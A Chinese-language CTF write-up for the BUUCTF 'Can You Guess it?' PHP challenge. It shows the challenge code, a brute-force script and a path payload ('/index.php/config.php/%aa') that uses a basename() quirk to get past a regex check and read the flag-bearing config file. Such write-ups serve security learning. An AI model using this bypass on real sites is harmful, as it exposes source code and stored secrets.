IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> BUUCTF WEB Can You Guess it? -> 正文阅读

[PHP知识库]BUUCTF WEB Can You Guess it?

代码审计,依旧有我们的老朋友preg_match,不会还有一个新朋友basename()
先看源码

<?php
include 'config.php'; // FLAG is defined in config.php

if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
  exit("I don't know what you are thinking, but I won't let you read it :)");
}

if (isset($_GET['source'])) {
  highlight_file(basename($_SERVER['PHP_SELF']));
  exit();
}

$secret = bin2hex(random_bytes(64));
if (isset($_POST['guess'])) {
  $guess = (string) $_POST['guess'];
  if (hash_equals($secret, $guess)) {
    $message = 'Congratulations! The flag is: ' . FLAG;
  } else {
    $message = 'Wrong.';
  }
}
?>
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Can you guess it?</title>
  </head>
  <body>
    <h1>Can you guess it?</h1>
    <p>If your guess is correct, I'll give you the flag.</p>
    <p><a href="?source">Source</a></p>
    <hr>
<?php if (isset($message)) { ?>
    <p><?= $message ?></p>
<?php } ?>
    <form action="index.php" method="POST">
      <input type="text" name="guess">
      <input type="submit">
    </form>
  </body>
</html>

$_SERVER[‘PHP_SELF’]用于获取当前带后缀的文件名,但由于apache的解析特性,他调用的其实是第一个文件后缀名
也就是说如果我的url是http://061f3b45-b4b9-4436-a86b-80baa90c1f7f.node4.buuoj.cn:81/index.php/config.php
他其实跳转到的是index.php页面
而basename函数则不同了,他读取的是最后一个后缀,这题考的其实也就是这个
$_SERVER[‘PHP_SELF’]是/index.php/config.php
到了basename里面他读到的是config.php,然后higlight_file
小demo:

<?php
$url='/index.php/config.php';
echo basename($url);
?>

下面问题就一个了,怎么绕过那么preg_match
preg_match(’/config.php/*$/i’, $_SERVER[‘PHP_SELF’])
写个脚本:

<?php
for($i=0;$i<255;$i++){
    $str="/index.php/config.php/".chr($i);
    preg_match('/config\.php\/*$/i', $str);
    echo $i.":".basename($str);
    echo "\n";
}
?>

这个正则匹配的是config.php结尾,其实只要后面有东西,除了%0A这些你告诉他正则匹配结束的,都会绕过的
以%aa为例,payload:/index/php/config.php/%aa
preg_match(’/config.php/*$/i’, $_SERVER[‘PHP_SELF’],由于他是%aa结尾,当然会过这个正则
到了basename这里,它会自动把%aa去掉,因为basename不接受大于128的ascii字符
于是自动被处理成了/index.php/config.php/,输出结果为config.php
参考视频链接:https://www.bilibili.com/video/BV1RU4y1Z71D/

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-03-06 12:42:42  更:2022-03-06 12:42:44 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/26 16:44:20-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计